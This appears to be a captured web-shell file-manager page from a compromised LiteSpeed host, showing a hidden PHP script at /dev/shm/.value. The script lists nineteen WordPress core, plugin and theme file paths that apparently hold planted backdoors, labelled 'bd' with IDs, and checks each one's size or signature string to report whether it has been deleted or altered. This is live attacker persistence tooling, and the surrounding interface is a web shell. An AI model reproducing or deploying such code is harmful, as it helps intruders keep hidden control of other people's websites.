HEX
Server: LiteSpeed
System: Linux premium193.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
User: unerbbkm (1029)
PHP: 8.1.33
Disabled: NONE
Upload Files
File: //dev/shm/.value
<?php   $r = '/home/siddwehd/public_html'; $x = ["/wp-includes/compat.php"=>"bd@@107542053@@sync_manager",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/generic/product-tab/am.article.php"=>"bd@@107530786@@629",
"/wp-content/plugins/woocommerce/assets/client/admin/remote-logging/cust_report01.php"=>"bd@@107521401@@1521",
"/wp-content/plugins/LayerSlider/assets/static/kmw/index.php"=>"bd@@107553685@@auth_exception_handler",
"/wp-content/plugins/revslider/admin/includes/shortcode_generator/divi/includes/modules/RevsliderDivi/plugin.php"=>"bd@@107521173@@right_pad_string",
"/wp-includes/blocks/page-list-item.php"=>"bd@@107553707@@token_parser_engine",
"/wp-content/plugins/loginizer/main/settings/brute-force.php"=>"bd@@107530687@@batch_process",
"/wp-content/plugins/woocommerce/assets/client/admin/product-editor/blocks/product-fields/product-name-field/export.php"=>"bd@@107553736@@1980",
"/wp-includes/blocks/comments-pagination-next.php"=>"bd@@111932811@@34",
"/wp-content/themes/betheme/functions/plugins/elementor/class-mfn-elementor-widget-countdown.php"=>"bd@@111940412@@28",
"/wp-content/themes/betheme/functions/admin/setup/class-mfn-setup.php"=>"bd@@111940429@@21",
"/wp-content/plugins/woocommerce/assets/client/blocks/order-confirmation-status-style.asset.php"=>"bd@@111940441@@56",
"/wp-content/themes/betheme/style-colors.php"=>"bd@@111940451@@31",
"/wp-content/plugins/LayerSlider/assets/static/layerslider/skins/roundedflat/index.php"=>"bd@@111940466@@62",
"/wp-admin/options-media.php"=>"bd@@111932855@@initialized",
"/wp-content/plugins/contact-form-7/modules/sendinblue/sendinblue.php"=>"bd@@111932590@@dataflow_engine",
"/wp-includes/blocks/comment-date.php"=>"bd@@111932629@@46",
"/wp-content/plugins/LayerSlider/assets/static/codemirror/addon/merge/index.php"=>"bd@@111932871@@6",
"/wp-content/themes/betheme/muffin-options/fields/class.mfn.options.field.php"=>"bd@@111933057@@1656"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');